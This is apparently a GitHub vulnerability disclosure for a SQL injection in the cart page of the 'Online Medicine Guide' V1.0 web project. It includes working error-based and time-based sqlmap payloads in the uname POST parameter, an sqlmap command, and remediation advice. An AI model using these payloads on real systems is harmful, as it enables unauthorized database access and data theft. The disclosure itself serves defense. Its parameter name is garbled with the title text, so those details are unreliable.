-
Notifications
You must be signed in to change notification settings - Fork 0
Description
code-projects Online Medicine Guide Project V1.0 /cart/index.php SQL injection
NAME OF AFFECTED PRODUCT(S)
- Online Medicine Guide
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
- shokaku
Vulnerable File
- /cart/index.php
VERSION(S)
- V1.0
Software Link
PROBLEM TYPE
Vulnerability Type
- SQL injection
Root Cause
- A SQL injection vulnerability was found in the '/cart/index.php' file of the 'Online Medicine Guide' project. The reason for this issue is that attackers inject malicious code from the parameter 'Array-like code-projects Online Medicine Guide Project V1.0 /cart/index.php SQL injection #1*' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
Impact
- Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
- During the security review of "Online Medicine Guide",I discovered a critical SQL injection vulnerability in the "/cart/index.php" file. This vulnerability stems from insufficient user input validation of the 'Array-like code-projects Online Medicine Guide Project V1.0 /cart/index.php SQL injection #1*‘ parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability lonameion:
- 'Array-like code-projects Online Medicine Guide Project V1.0 /cart/index.php SQL injection #1*' parameter
Payload:
---
Parameter: Array-like #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: uname=1111' AND GTID_SUBSET(CONCAT(0x7176717671,(SELECT (ELT(1706=1706,1))),0x7170716271),1706) AND 'VNma'='VNma&umobile=11111111111&uaddress=11111®ion=Uttara&quantity[2]=1&quantity[4]=1&quantity[8]=167
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1111' AND (SELECT 1509 FROM (SELECT(SLEEP(5)))Lxix) AND 'ucig'='ucig&umobile=11111111111&uaddress=11111®ion=Uttara&quantity[2]=1&quantity[4]=1&quantity[8]=167
---
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
sqlmap -u "http:/127.0.0.1/medicine_guide-master/cart/index.php" --data="Array-like #1*" --batch --dbs

Suggested repair
-
Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. -
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format. -
Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. -
Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.